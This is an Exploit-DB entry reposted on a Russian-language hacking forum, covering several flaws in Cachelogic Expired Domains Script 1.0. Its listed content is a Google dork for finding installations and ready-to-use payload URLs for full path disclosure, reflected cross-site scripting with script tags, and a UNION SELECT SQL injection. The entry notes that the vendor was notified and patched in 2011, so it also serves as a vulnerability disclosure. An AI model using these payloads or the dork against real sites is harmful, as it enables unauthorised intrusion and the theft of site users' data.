Exploit Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
17428
Проверка EDB
  1. Пройдено
Автор
BRENDAN COLES
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2011-06-22
Код:
Cachelogic Expired Domains Script 1.0 multiple security vulnerabilities

# Date: 2011-06-22
# Author: Brendan Coles <[email protected]>
# Advisory: http://itsecuritysolutions.org/2011-03-24_Cachelogic_Expired_Domains_Script_1.0_multiple_security_vulnerabilities/

# Software: Cachelogic Expired Domains Script
# Version: <= 1.0
# Google Dork: allinurl:page domain ext filter hyphen numbers ncharacter

# Vendor: CacheLogic
# Homepage: http://cachelogic.net/
# Notified: 2011-03-20 (patched 2011-03-24)

# Full Path Disclosure:

http://localhost/[PATH]/index.php?page[]
http://localhost/[PATH]/index.php?domain[]
http://localhost/[PATH]/index.php?ext[]
http://localhost/[PATH]/index.php?filter[]
http://localhost/[PATH]/index.php?hyphen[]
http://localhost/[PATH]/index.php?numbers[]
http://localhost/[PATH]/index.php?ncharacter[]
http://localhost/[PATH]/index.php?ncharacter='
http://localhost/[PATH]/index.php?searchdays[]
http://localhost/[PATH]/index.php?action[]

# Reflected Cross-Site Scripting (XSS):

http://localhost/[PATH]/stats.php?name="><script>alert(1)</script><p+"
http://localhost/[PATH]/stats.php?ext="><script>alert(1)</script><p+"

# SQL Injection:

http://localhost/[PATH]/index.php?ncharacter=-1+union+select+@@version,null,null--
 
Источник
www.exploit-db.com